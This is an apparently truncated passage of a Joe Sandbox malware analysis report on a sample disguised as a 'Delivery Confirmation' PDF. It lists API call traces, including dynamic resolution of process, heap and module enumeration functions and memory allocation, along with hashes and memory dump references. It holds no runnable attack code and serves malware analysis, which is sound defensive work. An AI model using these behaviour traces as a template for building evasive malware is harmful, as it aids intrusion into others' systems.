                                                                  • Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                  • Instruction ID: 0f1c6449ed9a11d00079be74fcd4e457882d7bb65a786c809fff159efa5d35e2
                                                                  • Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                  • Instruction Fuzzy Hash: A3C08CA02022040E9E6062FC2CC029A42CE09841343A01B61E33CD65C2E331D86B3810
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction ID: 5b3e099d89e6ce903cf892b354dcc3f20515ac56cbd60f8ec196bb6d398bf7fc
                                                                  • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction Fuzzy Hash: 61C012A260062457EB355A989CC075672CCEB85295B1804A1D708D7241E3B19D005A64
                                                                  APIs
                                                                  • timeSetEvent.WINMM(00002710,00000000,02CFBB44,00000000,00000001), ref: 02CFBB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Eventtime
                                                                  • String ID:
                                                                  • API String ID: 2982266575-0
                                                                  • Opcode ID: c6884e7783331d06a0d50a2cab134fca838da106a747409aaf8cc31213c1efb4
                                                                  • Instruction ID: 248cf2bcbdb723a0efc6d4558542faee154189c5b92b3bbcfdc60389b440edc5
                                                                  • Opcode Fuzzy Hash: c6884e7783331d06a0d50a2cab134fca838da106a747409aaf8cc31213c1efb4
                                                                  • Instruction Fuzzy Hash: 41C092F07C13007EFA645BA95CC2F23A1CDE348B14FA00822BB01EE2D5D6E24DA05A64
                                                                  APIs
                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02CD4BEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID:
                                                                  • API String ID: 2525500382-0
                                                                  • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                  • Instruction ID: 69bc00ec4179500b25c245fcf6b0da2f5614492ba2e671a661f5236b155c9991
                                                                  • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                  • Instruction Fuzzy Hash: 3AB09228288A0228FA2815A20D00B32008C0BA0286F8800919F29C8080EB52C1019832
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02CD4C03
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                  • Instruction ID: d36beaef2c89e40e5224554208eaef6f1c9325482635e8714df3755d92c3c283
                                                                  • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                  • Instruction Fuzzy Hash: 14A022AC000B030A8F3F232C000022A20333FE23023CEC8E883000A0008F3B8000BC30
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02CD1A03,?,02CD1FC1), ref: 02CD15E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 63e60dd2789070400fe8a3fc863d79e026162a2c57265bc51a7da5cc24b11611
                                                                  • Instruction ID: a6899e185a324ed4b5dda88fd6eb4ebd7ea300644e3c78b8e4a2564541be8267
                                                                  • Opcode Fuzzy Hash: 63e60dd2789070400fe8a3fc863d79e026162a2c57265bc51a7da5cc24b11611
                                                                  • Instruction Fuzzy Hash: AFF06DF0B413004FEB15CFB9D9443417BD2E789348F158579D709DB388E7B1A80A8B00
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02CD1FC1), ref: 02CD16A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: fad18c348faf7436e1764580855e1dde0b904111855f843a64ff612df0079117
                                                                  • Instruction ID: bdb339a0815ab278c6dbb53dcf2c61539f7bb0ff3ba0f1c2db2426afadae574f
                                                                  • Opcode Fuzzy Hash: fad18c348faf7436e1764580855e1dde0b904111855f843a64ff612df0079117
                                                                  • Instruction Fuzzy Hash: 8FF09AF2A447956BD7119E5ADC80B82BB94FB40326F090139EA489B340D7B0AC108BD4
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02CD1FE4), ref: 02CD1704
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: c9f0cda64f50f112a06729f4a99b1cfb4a0487f40d62eef078201199e50bd6b9
                                                                  • Instruction ID: 77c8da101ad563822d244a2ec439aefe42f98bf317bf7c462507cf268a0b23e1
                                                                  • Opcode Fuzzy Hash: c9f0cda64f50f112a06729f4a99b1cfb4a0487f40d62eef078201199e50bd6b9
                                                                  • Instruction Fuzzy Hash: 49E086753003016FD7105A7A9D407126BD8EB44664F194476F749DB251D2E0E8108B60
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CEABE3,?,?,02CEAC75,00000000,02CEAD51), ref: 02CEA970
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CEA988
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CEA99A
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CEA9AC
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CEA9BE
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CEA9D0
                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CEA9E2
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CEA9F4
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CEAA06
                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CEAA18
                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CEAA2A
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CEAA3C
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CEAA4E
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CEAA60
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CEAA72
                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CEAA84
                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CEAA96
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                  • API String ID: 667068680-597814768
                                                                  • Opcode ID: 5a8e2ef63be6afab92f1f7fc54b50cc858e4ec70371ae934ba6c012b4e36c01c
                                                                  • Instruction ID: ff003c1eacb65a0ff0e60fb5445d162fb8b678d0243e3a0fa6dc52e5614ef20f
                                                                  • Opcode Fuzzy Hash: 5a8e2ef63be6afab92f1f7fc54b50cc858e4ec70371ae934ba6c012b4e36c01c
                                                                  • Instruction Fuzzy Hash: F93181B6A84721AFEF11AFA4E885A2A37AEAB06700B500979E507CF204D774E851DF51
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD58D1
                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02CD58E8
                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02CD5918
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD597C
                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59B2
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59C5
                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59D7
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59E3
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000), ref: 02CD5A17
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338), ref: 02CD5A23
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02CD5A45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: 2ee64cbcc39eaf167352544b45de0a1d520b250b24f17f925a096ce6e0bc6c5c
                                                                  • Instruction ID: 8576b7a9aa9cb83f473cdcc73a9dc7b553fc7c0f9daf9e0500f81070b0d1aaa3
                                                                  • Opcode Fuzzy Hash: 2ee64cbcc39eaf167352544b45de0a1d520b250b24f17f925a096ce6e0bc6c5c
                                                                  • Instruction Fuzzy Hash: 85416F71E40269AFDB10DBE8CC88AEEB7BDAF48390F4845A5A248E7241D7709B44CF50
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CD5B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CD5BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CD5BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CD5BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CD5C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CD5C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                  • Instruction ID: bbc0a39e94a6729e75e08279cf18ecce4f834adf45fd7f99a605d78a3d2d531a
                                                                  • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                  • Instruction Fuzzy Hash: A23173B1E4061C3AEB25D6F89C85BEF77AD5B443C0F4805E29708E6181DBB59B848F90
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02CD7F7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  • Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                  • Instruction ID: d4448b4af649d01569681f3f5e1f70597f595ed80bfe23e88b1866a9f7a9d6f2
                                                                  • Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                  • Instruction Fuzzy Hash: 5D11D2B5E00209AFDB04DF99C981DAFF7F9EFCC704B14C569A509EB254E6719A01CB90
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                  • Instruction ID: b7accd407d5a98795ea9f36477d426153bbfa8bb54eb426ebc3562b31e5b49b4
                                                                  • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                  • Instruction Fuzzy Hash: 8CE0D83570021417D329A5685C80DF6B35D975C310F00427EFF05C7340FEB09E404AE4
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,02CFC106,00000000,02CFC11E), ref: 02CDB722
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: ba5b935e1461643d2b84f5d3c8702bac15a6e94f6de92f865f528d85490654ab
                                                                  • Instruction ID: 62dd415155857a243635009cfd03fdc008a3ec0948abd51912dc1676b7ef7b56
                                                                  • Opcode Fuzzy Hash: ba5b935e1461643d2b84f5d3c8702bac15a6e94f6de92f865f528d85490654ab
                                                                  • Instruction Fuzzy Hash: 1EF0DA74944301DFC394DF28E540B1977E5FB89714F424A2AE69ACB384E734D814DF62
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02CDBDFA,00000000,02CDC013,?,?,00000000,00000000), ref: 02CDA7AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction ID: 332e28c06355ed5c5ac9d711c124ce19ae9ad14395235dbdb29efab40937a061
